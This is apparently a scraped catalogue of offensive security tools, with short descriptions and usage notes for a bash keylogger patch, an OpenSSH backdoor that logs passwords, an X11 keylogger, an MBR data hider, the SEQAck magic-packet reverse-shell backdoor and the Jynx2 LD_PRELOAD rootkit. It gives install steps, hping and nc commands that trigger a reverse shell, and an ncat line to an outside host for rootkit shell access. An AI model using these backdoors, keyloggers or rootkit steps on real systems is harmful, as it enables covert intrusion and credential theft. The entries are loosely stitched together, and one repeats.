SSH Back is a set of shell scripts that assist you in shuffling an ssh connection over socat and ssl.
A keylogger tool that a set of patches for bash and a command, captures all logged in user inputs and sends it into fifos. then can be able to monitor those key-strokes in real-time.
1. get bash-3.0.tar.gz
2. tar xzvf bash-3.0.tar.gz
3. cd bash-3.0
4. wget http://www.chollian.net/~jyj9782/geinblues/stuff/bash-geinpeek/bash-3.0-
geinpeek-0.2.tar.gz
5. tar xzvf bash-3.0-geinpeek-0.2.tar.gz
6. patch < Makefile.in-geinpeek.diff
7. patch < [patch file name you wanna add]
patch kit list
- execute_cmd.c-geinpeek.diff ( not stable yet )
- shell.c-geinpeek.diff ( not good )
the forces with you man ~
NEW FEATURE:
[root@elizabeth bash-3.0]# ./ghelper s.txt
[BASH-GEINPEEK MONITOR]
[Hint: when if you have to stop it 'CTRL+C']
Mon Feb 13 03:20:53 2006 - [file@/dev/pts/38 /tmp]$ ls --color=tty -al
Mon Feb 13 03:20:53 2006 - [file@/dev/pts/38 /tmp]$ ls --color=tty
Mon Feb 13 03:20:55 2006 - [file@/dev/pts/38 /tmp]$ ./script.sh
!s! Mon Feb 13 03:20:55 2006 - [file@/dev/pts/38 /tmp]$ ls
!s! Mon Feb 13 03:20:55 2006 - [file@/dev/pts/38 /tmp]$ ls
!s! Mon Feb 13 03:20:55 2006 - [file@/dev/pts/38 /tmp]$ whoami
[root@elizabeth bash-3.0]# ./ghelper s.txt -i
[BASH-GEINPEEK MONITOR]
[Hint: when if you have to stop it 'CTRL+C']
Mon Feb 13 03:21:01 2006 - [file@/dev/pts/38 /tmp]$ ./script.sh
Mon Feb 13 03:21:02 2006 - [file@/dev/pts/38 /tmp]$ ls --color=tty
Mon Feb 13 03:21:03 2006 - [file@/dev/pts/38 /tmp]$ clear
above !s! marked command logs are executed in some shell script.
then -i flag of ghelper ignored standard output of them.
This script provides OpenSSH backdoor functionality with a magic password and logs passwords as well. It leverages the same basic idea behind common OpenSSH patches but this script attempts to make the process version agnostic. Use at your own risk.
This tool stores up to 426 bytes in the MBR's bootloader code section of unused devices such as usb drivers, hrd disks (which are not supposed to boot) and other media. GRUB detection is implemented for safety reasons, Windows bootloader code will be shamelessly overwritten.
Description:
XKeylog is a X11 keylogger for Unix that basically uses xlib to interact with users keyboard. iXkeylog will listen for certain X11 events and then trigger specific routines to handle these events.
MD5:
39e280cd02a3f01dffa1c6cae8e5b17e
Author:
Cyneox
This tool stores up to 426 bytes in the MBR's bootloader code section of unused devices such as usb drivers, hrd disks (which are not supposed to boot) and other media. GRUB detection is implemented for safety reasons, Windows bootloader code will be shamelessly overwritten.
INSTALLATION
make
sudo make install
make clean
FIRST STEPS
Get yourself a copy of your own MBR with
dd if=/dev/sdx of=my_mbr.img count=1
or use one of the provided samples in doc/.
Read, store and check your results with your favorite hex editor (e.g. g
hex2).
Be careful to not demage your bootloader!
Run fdisk -l or dmesg to determine the correct device
AUTHOR
atzeton
nullsecurity.net
LICENSE
GNU GPLv2+
SEQAck is an SSL encrypted, magic packet triggered reverse connect backdoor application. I wrote this as part of the original Jynx-Kit LD_PRELOAD rootkit, as released on from the Blackhat Library. With the second installation of the rootkit, we moved away from the stand alone reverse connection backdoor, and decided to hook accept() system call instead. Not only was it simply to demonstrate another example of creating a backdoor, but it also fit perfectly with what we were doing; making things more modular.
This backdoor silently sniffs on the given interface for all incoming TCP packets. It relies on two defined rules, MAGIC_SEQ and MAGIC_ACK, which are easily manipulated in the TCP headers. Once the magic packet is received, it initiates an SSL encrypted reverse connecting shell to the host that sent the packet, on the given source port. For example, we can initiate the reverse connect with the following hping command.
# hping -M 0xdead -L 0xbeef google.com -s 5000 -c 1
Notice, the source port is 5000, SEQ (-M) is 0xdead and ACK (-L) is 0xbeef. With this example, we'd also need the following nc (netcat supplied with nmap) running in the background to accept the incoming connection.
# nc -l -p 5000 --ssl
And there you have it, the reverse connect shell was successful, and you're in complete control. The idea of using SEQ/ACK values could be applied to a single packet port knock sequence as well, so this application could be easily tweaked or expanded upon based on your requirements
Jynx2 is an expansion of the original Jynx LD_Preload rootkit written in C with several modifications for multi-factor authentication, a more compatible shell drop, and additional hiding features.
Features:
Hiding from netstat
Hiding from ps/top and /proc
File hiding
SSL connect accept() hook
Multi-factor authentication
Improved anti-removal features
SUID Drop-shell with environment variable
Protip: It is possible to make Jynx2 even more difficult to remove by hooking C's link() function, therefore we recommend that any LD_Preload rootkit be removed using a LiveCD.
Usage:
Once Jynx2 is successfully installed on a target machine, accessing it's accept() hook with the default configuration looks like:
[user@host ~]$ sudo ncat exploit.net 80 -p 42 --ssl
DEFAULT_PASS
Bump with shell.
>ls -lia
214473 drwxr-xr-x 2 user users 176 Mar 7 19:19 .
177137 drwxr-xr-x 15 user users 952 Mar 5 22:15 ..
Protip: Make sure to using the --ssl flag with ncat, otherwise Jynx2 will not accept the connection, with the connection's file descriptor being passed to the backdoored service in stead.
ftp-like client to access SMB/CIFS resources on servers. This tool is part of the linux samba suite.